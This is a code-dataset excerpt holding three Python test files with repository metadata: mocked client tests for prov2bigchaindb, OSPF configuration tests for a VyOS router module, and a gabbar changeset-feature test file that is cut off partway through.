hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ce28fb507443089ac0720812f011e25007170b8a
| 13,885
|
py
|
Python
|
prov2bigchaindb/tests/core/test_clients.py
|
DLR-SC/prov2bigchaindb
|
a21c78a80e502409281aa25999756f2b695d8301
|
[
"Apache-2.0"
] | 6
|
2017-04-06T07:34:20.000Z
|
2020-12-31T07:56:29.000Z
|
prov2bigchaindb/tests/core/test_clients.py
|
DLR-SC/prov2bigchaindb
|
a21c78a80e502409281aa25999756f2b695d8301
|
[
"Apache-2.0"
] | 25
|
2017-04-07T12:45:11.000Z
|
2018-11-08T11:21:04.000Z
|
prov2bigchaindb/tests/core/test_clients.py
|
DLR-SC/prov2bigchaindb
|
a21c78a80e502409281aa25999756f2b695d8301
|
[
"Apache-2.0"
] | null | null | null |
import logging
import unittest
from time import sleep
from unittest import mock
from bigchaindb_driver import pool as bdpool
from prov2bigchaindb.core import utils, clients
from prov2bigchaindb.tests.core import setup_test_files
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class BaseClientTest(unittest.TestCase):
    """Test BigchainDB Base Client."""

    def setUp(self):
        # Connection/account fixture values shared by every test in this
        # class; the key/account fields are kept for symmetry with the other
        # client test classes even though BaseClient only needs host/port.
        self.account_id = 'Base_Client_Test'
        self.public_key = 'public'
        self.private_key = 'private'
        self.host = '127.0.0.1'
        self.port = 9984

    def tearDown(self):
        # Delete fixtures explicitly so no state leaks between tests.
        del self.account_id
        del self.public_key
        del self.private_key
        del self.host
        del self.port

    # mock.patch decorators are applied bottom-up, so the first injected
    # argument (mock_bdb) is the bd.BigchainDB patch and the second
    # (mock_store) is the local_stores.SqliteStore patch.
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
    def test_positive_init(self, mock_bdb, mock_store):
        # A freshly constructed BaseClient must expose the composed node URL.
        baseclient = clients.BaseClient(self.host, self.port)
        baseclient.connection = mock_bdb
        baseclient.accountstore = mock_store
        self.assertIsInstance(baseclient, clients.BaseClient)
        # self.assertIsInstance(baseclient.accountstore, utils.LocalAccountStore)
        self.assertIsInstance(baseclient.node, str)
        self.assertEqual(baseclient.node, 'http://127.0.0.1:9984')
        # TODO Check Instance of account_db

    @unittest.skip("testing skipping")
    def test_test_transaction(self):
        raise NotImplementedError()

    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
    def test_save_document(self, mock_bdb, mock_store):
        # BaseClient is abstract: save_document must raise NotImplementedError.
        baseclient = clients.BaseClient(self.host, self.port)
        baseclient.connection = mock_bdb
        baseclient.accountstore = mock_store
        with self.assertRaises(NotImplementedError):
            baseclient.save_document('foo')
class DocumentConceptClientTest(unittest.TestCase):
    """Test BigchainDB DocumentConcept Client."""

    def setUp(self):
        # Connection fixtures plus a parsed PROV document used as payload.
        self.account_id = 'Document_Client_Test'
        self.public_key = 'public'
        self.private_key = 'private'
        self.host = '127.0.0.1'
        self.port = 9984
        self.test_prov_files = setup_test_files()
        self.prov_document = utils.to_prov_document(content=self.test_prov_files["simple"])

    def tearDown(self):
        # Delete fixtures explicitly so no state leaks between tests.
        del self.account_id
        del self.public_key
        del self.private_key
        del self.host
        del self.port
        del self.test_prov_files
        del self.prov_document

    # Decorators apply bottom-up: mock_account = DocumentConceptAccount patch,
    # mock_dbd = bd.BigchainDB patch, mock_store = SqliteStore patch.
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
    @mock.patch('prov2bigchaindb.core.clients.accounts.DocumentConceptAccount')
    def test_positive_init(self, mock_account, mock_dbd, mock_store):
        doc_client = clients.DocumentConceptClient(self.account_id, self.host, self.port)
        self.assertIsInstance(doc_client, clients.DocumentConceptClient)
        # self.assertIsInstance(baseclient.accountstore, utils.LocalAccountStore)
        # self.assertIsInstance(baseclient.account, accounts.DocumentModelAccount)
        self.assertIsInstance(doc_client.node, str)
        self.assertEqual(doc_client.node, 'http://127.0.0.1:9984')
        # TODO Check Instance of account_db
        # TODO Check Instance of account

    @mock.patch('prov2bigchaindb.core.clients.utils.is_valid_tx')
    @mock.patch('prov2bigchaindb.core.clients.utils.is_block_to_tx_valid')
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
    @mock.patch('prov2bigchaindb.core.clients.accounts.DocumentConceptAccount')
    def test_get_document(self, mock_account, mock_bdb, mock_store, mock_test_block, mock_test_tx):
        # The mocked connection returns a transaction whose asset payload is
        # the serialized PROV document; validity checks are forced to True so
        # retrieval logic alone is exercised.
        mock_bdb.transactions.retrieve.return_value = {'id': '1', 'asset': {
            'data': {'prov': self.prov_document.serialize(format='json')}}}
        mock_test_block.return_value = True
        mock_test_tx.return_value = True
        doc_client = clients.DocumentConceptClient(self.account_id, self.host, self.port)
        doc_client.account = mock_account
        doc_client.connection_pool = bdpool.Pool([mock_bdb])
        # Test
        document = doc_client.get_document('1')
        # NOTE(review): sleep(1) presumably lets asynchronous work settle
        # before asserting on the mock — confirm whether it is still needed.
        sleep(1)
        doc_client._get_bigchain_connection().transactions.retrieve.assert_called_with('1')
        self.assertEqual(document, self.prov_document)

    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
    @mock.patch('prov2bigchaindb.core.clients.accounts.DocumentConceptAccount')
    def test_save_document(self, mock_account, mock_bdb, mock_store):
        # Saving must delegate to the account's save_asset with the
        # serialized document and return the resulting transaction id.
        mock_account.save_asset.return_value = '1'
        doc_client = clients.DocumentConceptClient(self.account_id, self.host, self.port)
        doc_client.account = mock_account
        doc_client.connection_pool = bdpool.Pool([mock_bdb])
        tx_id = doc_client.save_document(self.prov_document)
        doc_client.account.save_asset.assert_called_with({'prov': self.prov_document.serialize(format='json')},
                                                         mock_bdb)
        self.assertIsInstance(tx_id, str)
        self.assertEqual(tx_id, '1')
class GraphConceptClientTest(unittest.TestCase):
    """Test BigchainDB GraphConcept Client (all tests currently skipped)."""

    def setUp(self):
        # Connection fixtures plus a parsed PROV document used as payload.
        self.account_id = 'Graph_Client_Test'
        self.public_key = 'public'
        self.private_key = 'private'
        self.host = '127.0.0.1'
        self.port = 9984
        self.test_prov_files = setup_test_files()
        self.prov_document = utils.to_prov_document(content=self.test_prov_files["simple"])

    def tearDown(self):
        # Delete fixtures explicitly so no state leaks between tests.
        del self.account_id
        del self.public_key
        del self.private_key
        del self.host
        del self.port
        del self.test_prov_files
        del self.prov_document

    @unittest.skip("testing skipping")
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    # NOTE(review): 'clients.clients.bd.BigchainDB' looks like a doubled
    # module segment (compare 'clients.bd.BigchainDB' used in the classes
    # above) — confirm the patch target before un-skipping these tests.
    @mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
    @mock.patch('prov2bigchaindb.core.clients.accounts.GraphConceptAccount')
    def test_positive_init(self, mock_account, mock_dbd, mock_store):
        graph_client = clients.GraphConceptClient(self.host, self.port)
        self.assertIsInstance(graph_client, clients.GraphConceptClient)
        # self.assertIsInstance(baseclient.accountstore, utils.LocalAccountStore)
        # self.assertIsInstance(baseclient.account, accounts.DocumentModelAccount)
        self.assertIsInstance(graph_client.node, str)
        self.assertEqual(graph_client.node, 'http://127.0.0.1:9984')

    @unittest.skip("testing skipping")
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.accounts.GraphConceptAccount')
    def test__get_prov_element_list(self, mock_account, mock_bdb):
        # NOTE(review): only two patches are stacked here (SqliteStore and
        # GraphConceptAccount), so despite its name the second parameter
        # receives the SqliteStore mock, not a BigchainDB mock.
        graph_client = clients.GraphConceptClient(self.host, self.port)
        prov_document = utils.to_prov_document(content=self.test_prov_files["simple2"])
        prov_records = prov_document.get_records()
        prov_namespaces = prov_document.get_registered_namespaces()
        element_list = clients.GraphConceptClient.calculate_account_data(prov_document)
        # Smoke-iterate the account data; no assertions yet (test is skipped).
        for element, relations, namespace in element_list:
            # print(element)
            # print("\twith: ",relations['with_id'])
            # print("\twithout: ",relations['without_id'])
            pass

    @unittest.skip("testing skipping")
    @mock.patch('prov2bigchaindb.core.clients.utils.is_valid_tx')
    @mock.patch('prov2bigchaindb.core.clients.utils.is_block_to_tx_valid')
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
    @mock.patch('prov2bigchaindb.core.clients.accounts.GraphConceptAccount')
    def test_get_document(self, mock_account, mock_bdb, mock_store, mock_test_block, mock_test_tx):
        # Mocked connection returns the serialized PROV document; validity
        # checks are forced to True so retrieval logic alone is exercised.
        mock_bdb.transactions.retrieve.return_value = {'id': '1', 'asset': {
            'data': {'prov': self.prov_document.serialize(format='json')}}}
        mock_test_block.return_value = True
        mock_test_tx.return_value = True
        graph_client = clients.GraphConceptClient(self.host, self.port)
        graph_client.account = mock_account
        graph_client.connection = mock_bdb
        # Test
        document = graph_client.get_document(['1'])
        sleep(1)
        graph_client.connection.transactions.retrieve.assert_called_with('1')
        self.assertEqual(document, self.prov_document)

    @unittest.skip("testing skipping")
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
    @mock.patch('prov2bigchaindb.core.clients.accounts.GraphConceptAccount')
    def test_save_document(self, mock_account, mock_bdb, mock_store):
        # Saving must delegate to the account's save_asset with the
        # serialized document and return the resulting transaction id.
        mock_account.save_asset.return_value = '1'
        graph_client = clients.GraphConceptClient(self.host, self.port)
        graph_client.account = mock_account
        graph_client.connection = mock_bdb
        tx_id = graph_client.save_document(self.prov_document)
        graph_client.account.save_asset.assert_called_with({'prov': self.prov_document.serialize(format='json')},
                                                           mock_bdb)
        self.assertIsInstance(tx_id, str)
        self.assertEqual(tx_id, '1')
class RoleConceptClientTest(unittest.TestCase):
    """Test BigchainDB RoleConcept Client (all tests currently skipped)."""

    def setUp(self):
        # Connection fixtures plus a parsed PROV document used as payload.
        self.account_id = 'Role_Client_Test'
        self.public_key = 'public'
        self.private_key = 'private'
        self.host = '127.0.0.1'
        self.port = 9984
        self.test_prov_files = setup_test_files()
        self.prov_document = utils.to_prov_document(content=self.test_prov_files["simple"])

    def tearDown(self):
        # Delete fixtures explicitly so no state leaks between tests.
        del self.account_id
        del self.public_key
        del self.private_key
        del self.host
        del self.port
        del self.test_prov_files
        del self.prov_document

    @unittest.skip("testing skipping")
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    # NOTE(review): 'clients.clients.bd.BigchainDB' looks like a doubled
    # module segment (compare 'clients.bd.BigchainDB' elsewhere in this
    # file) — confirm the patch target before un-skipping these tests.
    @mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
    @mock.patch('prov2bigchaindb.core.clients.accounts.RoleConceptAccount')
    def test_positive_init(self, mock_account, mock_bdb, mock_store):
        role_client = clients.RoleConceptClient(self.host, self.port)
        self.assertIsInstance(role_client, clients.RoleConceptClient)
        # self.assertIsInstance(baseclient.accountstore, utils.LocalAccountStore)
        # self.assertIsInstance(baseclient.account, accounts.DocumentModelAccount)
        self.assertIsInstance(role_client.node, str)
        self.assertEqual(role_client.node, 'http://127.0.0.1:9984')
        # TODO Check Instance of account_db
        # TODO Check Instance of account

    @unittest.skip("testing skipping")
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.accounts.RoleConceptAccount')
    def test__get_prov_element_list(self, mock_account, mock_store):
        # Fixed local-name typos from the original ('moch_bdb', 'role_clien').
        # Only two patches are stacked, so the second parameter receives the
        # SqliteStore mock and is named accordingly.
        role_client = clients.RoleConceptClient(self.host, self.port)
        prov_document = utils.to_prov_document(content=self.test_prov_files["simple2"])
        prov_records = prov_document.get_records()
        prov_namespaces = prov_document.get_registered_namespaces()
        element_list = clients.RoleConceptClient.calculate_account_data(prov_document)
        # Smoke-iterate the account data; no assertions yet (test is skipped).
        for element, relations, namespace in element_list:
            # print(element)
            # print("\twith: ",relations['with_id'])
            # print("\twithout: ",relations['without_id'])
            pass

    @unittest.skip("testing skipping")
    @mock.patch('prov2bigchaindb.core.clients.utils.is_valid_tx')
    @mock.patch('prov2bigchaindb.core.clients.utils.is_block_to_tx_valid')
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
    @mock.patch('prov2bigchaindb.core.clients.accounts.RoleConceptAccount')
    def test_get_document(self, mock_account, mock_bdb, mock_store, mock_test_block, mock_test_tx):
        # Mocked connection returns the serialized PROV document; validity
        # checks are forced to True so retrieval logic alone is exercised.
        mock_bdb.transactions.retrieve.return_value = {'id': '1', 'asset': {
            'data': {'prov': self.prov_document.serialize(format='json')}}}
        mock_test_block.return_value = True
        mock_test_tx.return_value = True
        role_client = clients.RoleConceptClient(self.host, self.port)
        role_client.account = mock_account
        role_client.connection = mock_bdb
        # Test
        document = role_client.get_document(['1'])
        sleep(1)
        role_client.connection.transactions.retrieve.assert_called_with('1')
        self.assertEqual(document, self.prov_document)

    @unittest.skip("testing skipping")
    @mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
    @mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
    @mock.patch('prov2bigchaindb.core.clients.accounts.RoleConceptAccount')
    def test_save_document(self, mock_account, mock_bdb, mock_store):
        # Saving must delegate to the account's save_asset with the
        # serialized document and return the resulting transaction id.
        mock_account.save_asset.return_value = '1'
        role_client = clients.RoleConceptClient(self.host, self.port)
        role_client.account = mock_account
        role_client.connection = mock_bdb
        tx_id = role_client.save_document(self.prov_document)
        role_client.account.save_asset.assert_called_with({'prov': self.prov_document.serialize(format='json')},
                                                          mock_bdb)
        self.assertIsInstance(tx_id, str)
        self.assertEqual(tx_id, '1')
| 46.750842
| 113
| 0.707022
| 1,631
| 13,885
| 5.789086
| 0.082771
| 0.084516
| 0.104215
| 0.121584
| 0.921521
| 0.900551
| 0.867295
| 0.866024
| 0.845584
| 0.829273
| 0
| 0.012653
| 0.186028
| 13,885
| 296
| 114
| 46.908784
| 0.822775
| 0.071732
| 0
| 0.774468
| 0
| 0
| 0.206258
| 0.166096
| 0
| 0
| 0
| 0.003378
| 0.119149
| 1
| 0.093617
| false
| 0.008511
| 0.029787
| 0
| 0.140426
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbff75631c8f62c5edd0b74b41ffb0e122fef308
| 2,951
|
py
|
Python
|
tests/test_ospf.py
|
inmanta/vyos
|
298a4232f3b8c841351fe399b200b6aa55b494f2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_ospf.py
|
inmanta/vyos
|
298a4232f3b8c841351fe399b200b6aa55b494f2
|
[
"Apache-2.0"
] | 35
|
2020-03-25T14:44:52.000Z
|
2022-02-14T12:11:09.000Z
|
tests/test_ospf.py
|
inmanta/vyos
|
298a4232f3b8c841351fe399b200b6aa55b494f2
|
[
"Apache-2.0"
] | null | null | null |
import vymgmt
def convert_bool(val):
    """Render a truthy/falsy value as the lowercase literal vyos expects."""
    return str(bool(val)).lower()
def test_ospf(project, vy_host, console: vymgmt.Router):
    # End-to-end check of the vyos::Ospf resource: deploy, verify
    # idempotence via dryrun, then purge and verify idempotence again.

    def make_config(purge=False):
        # Compile an inmanta model configuring OSPF on the lab router.
        # NOTE(review): the original indentation of this config literal was
        # lost in transit; the inmanta compiler is assumed to be tolerant of
        # leading whitespace — confirm against the repository copy.
        project.compile(
            f"""
import vyos

r1 = vyos::Host(
    name="lab1",
    user="vyos",
    password="vyos",
    ip="{vy_host}")

ospf1 = vyos::Ospf(
    area=0,
    network=["10.15.1.0/24"],
    router_id="10.1.1.1",
    host=r1,
    purged={convert_bool(purge)}
)
"""
        )

    # Reset the device to a known clean configuration before testing.
    console.configure()
    console.run_conf_mode_command("load /config/clear.config")
    out = console.run_conf_mode_command("commit")
    print(out)
    console.exit(force=True)

    # Initial deploy: dryrun must show exactly one pending change ("purged").
    make_config()
    compare = project.dryrun_resource("vyos::Config")
    assert "purged" in compare
    assert len(compare) == 1
    project.deploy_resource("vyos::Config")
    # After deployment a second dryrun must report no remaining changes.
    compare = project.dryrun_resource("vyos::Config")
    assert len(compare) == 0

    # Purge cycle: same single-change-then-clean pattern.
    make_config(True)
    compare = project.dryrun_resource("vyos::Config")
    assert "purged" in compare
    assert len(compare) == 1
    project.deploy_resource("vyos::Config")
    compare = project.dryrun_resource("vyos::Config")
    assert len(compare) == 0
def test_ospf_redistribute(project, vy_host, console: vymgmt.Router):
    # Like test_ospf, but also exercises vyos::OspfRedistribute, including
    # switching the redistribute type from "connected" to "static".

    def make_config(purge=False, redistributes="connected"):
        # Compile an inmanta model with OSPF plus one redistribute rule.
        # NOTE(review): the original indentation of this config literal was
        # lost in transit; confirm against the repository copy.
        project.compile(
            f"""
import vyos

r1 = vyos::Host(
    name="lab1",
    user="vyos",
    password="vyos",
    ip="{vy_host}")

ospf1 = vyos::Ospf(
    area=0,
    network=["10.15.1.0/24"],
    router_id="10.1.1.1",
    host=r1,
    purged={convert_bool(purge)},
)

vyos::OspfRedistribute(
    type="{redistributes}",
    ospf=ospf1
)
"""
        )

    # Reset the device to a known clean configuration before testing.
    console.configure()
    console.run_conf_mode_command("load /config/clear.config")
    out = console.run_conf_mode_command("commit")
    print(out)
    console.exit(force=True)

    # Initial deploy and idempotence check.
    make_config()
    compare = project.dryrun_resource("vyos::Config")
    assert "purged" in compare
    assert len(compare) == 1
    project.deploy_resource("vyos::Config")
    compare = project.dryrun_resource("vyos::Config")
    assert len(compare) == 0

    # Changing the redistribute type must show both the removal of the old
    # rule and the addition of the new one in the dryrun diff.
    make_config(redistributes="static")
    compare = project.dryrun_resource("vyos::Config")
    assert len(compare) == 2
    assert "protocols ospf redistribute connected metric-type" in compare
    assert "protocols ospf redistribute static metric-type" in compare
    project.deploy_resource("vyos::Config")
    compare = project.dryrun_resource("vyos::Config")
    assert len(compare) == 0

    # Purge cycle: single pending change, then clean dryrun.
    make_config(True)
    compare = project.dryrun_resource("vyos::Config")
    assert "purged" in compare
    assert len(compare) == 1
    project.deploy_resource("vyos::Config")
    compare = project.dryrun_resource("vyos::Config")
    assert len(compare) == 0
| 23.608
| 73
| 0.620129
| 350
| 2,951
| 5.097143
| 0.194286
| 0.100897
| 0.151345
| 0.156951
| 0.837444
| 0.837444
| 0.837444
| 0.837444
| 0.837444
| 0.807175
| 0
| 0.021105
| 0.245341
| 2,951
| 124
| 74
| 23.798387
| 0.779973
| 0
| 0
| 0.769231
| 0
| 0
| 0.372416
| 0.066079
| 0
| 0
| 0
| 0
| 0.175824
| 1
| 0.054945
| false
| 0.021978
| 0.032967
| 0.010989
| 0.098901
| 0.021978
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02472e7c257263c2b3f45c63efe5cdc86ca03cbe
| 4,647
|
py
|
Python
|
tests/test_mod.py
|
LaudateCorpus1/gabbar
|
92014028b3a283467f45554087539876d5ee94eb
|
[
"MIT"
] | 19
|
2017-02-08T16:55:07.000Z
|
2019-10-09T03:55:54.000Z
|
tests/test_mod.py
|
mapbox/gabbar
|
2911f6610cdfedfd9736fe7f3b55a34e039a8d7e
|
[
"MIT"
] | 63
|
2017-02-06T11:23:23.000Z
|
2017-07-16T16:23:13.000Z
|
tests/test_mod.py
|
LaudateCorpus1/gabbar
|
92014028b3a283467f45554087539876d5ee94eb
|
[
"MIT"
] | 9
|
2017-02-11T19:19:48.000Z
|
2021-10-20T07:59:58.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import os
import gabbar
# Number of decimals of accuracy for testing equality.
NUMBER_OF_DECIMALS = 3
def test_get_features():
    # Regression snapshot: feature extraction for a known changeset must
    # reproduce the expected dict exactly.
    changeset_id = u'47734592'
    # TODO: This is too non-verbose. Not scalable!!!
    expected = {"changeset_id": "47734592", "features_created": 1, "features_modified": 0, "features_deleted": 0, "user_id": 5662807, "user_name": "Bhuvan Anand", "user_first_edit": "1492071806", "user_changesets": 1, "user_features": 1, "bbox_area": 0, "changeset_editor": "iD", "node_count": 1, "way_count": 0, "relation_count": 0, "property_modifications": 0, "geometry_modifications": 0, "feature_version_new": 1, "feature_version_low": 0, "feature_version_medium": 0, "feature_version_high": 0, "changeset_editor_iD": 1, "changeset_editor_JOSM": 0, "changeset_editor_MAPS.ME": 0, "changeset_editor_Potlatch": 0, "changeset_editor_Redaction bot": 0, "changeset_editor_Vespucci": 0, "changeset_editor_OsmAnd": 0, "changeset_editor_Merkaartor": 0, "changeset_editor_gnome": 0, "changeset_editor_other": 0, "aerialway": 0, "aeroway": 0, "amenity": 1, "barrier": 0, "boundary": 0, "building": 0, "craft": 0, "emergency": 0, "geological": 0, "highway": 0, "historic": 0, "landuse": 0, "leisure": 0, "man_made": 0, "military": 0, "natural": 0, "office": 0, "place": 0, "power": 0, "public_transport": 0, "railway": 0, "route": 0, "shop": 0, "sport": 0, "tourism": 0, "waterway": 0}
    actual = gabbar.get_features(changeset_id)
    # Compare via sorted-key JSON so dict ordering cannot cause a spurious
    # mismatch.
    assert json.dumps(actual, sort_keys=True) == json.dumps(expected, sort_keys=True)
def test_filter_features():
    # gabbar.filter_features must map the raw feature dict onto the expected
    # numeric vector, element for element.
    features = {"changeset_id": "47734592", "features_created": 1, "features_modified": 0, "features_deleted": 0, "user_id": 5662807, "user_name": "Bhuvan Anand", "user_first_edit": "1492071806", "user_changesets": 1, "user_features": 1, "bbox_area": 0, "changeset_editor": "iD", "node_count": 1, "way_count": 0, "relation_count": 0, "property_modifications": 0, "geometry_modifications": 0, "feature_version_new": 1, "feature_version_low": 0, "feature_version_medium": 0, "feature_version_high": 0, "changeset_editor_iD": 1, "changeset_editor_JOSM": 0, "changeset_editor_MAPS.ME": 0, "changeset_editor_Potlatch": 0, "changeset_editor_Redaction bot": 0, "changeset_editor_Vespucci": 0, "changeset_editor_OsmAnd": 0, "changeset_editor_Merkaartor": 0, "changeset_editor_gnome": 0, "changeset_editor_other": 0, "aerialway": 0, "aeroway": 0, "amenity": 1, "barrier": 0, "boundary": 0, "building": 0, "craft": 0, "emergency": 0, "geological": 0, "highway": 0, "historic": 0, "landuse": 0, "leisure": 0, "man_made": 0, "military": 0, "natural": 0, "office": 0, "place": 0, "power": 0, "public_transport": 0, "railway": 0, "route": 0, "shop": 0, "sport": 0, "tourism": 0, "waterway": 0}
    expected = [1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    actual = gabbar.filter_features(features)
    print(json.dumps(actual))
    # The original looped over expected then over actual separately, which
    # was an implicit (IndexError-based) length check; make it explicit and
    # compare pairwise once.
    assert len(actual) == len(expected)
    for got, want in zip(actual, expected):
        assert got == want
def test_normalize_features():
    # gabbar.normalize_features must reproduce the expected normalized vector
    # to NUMBER_OF_DECIMALS decimal places.
    features = [1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
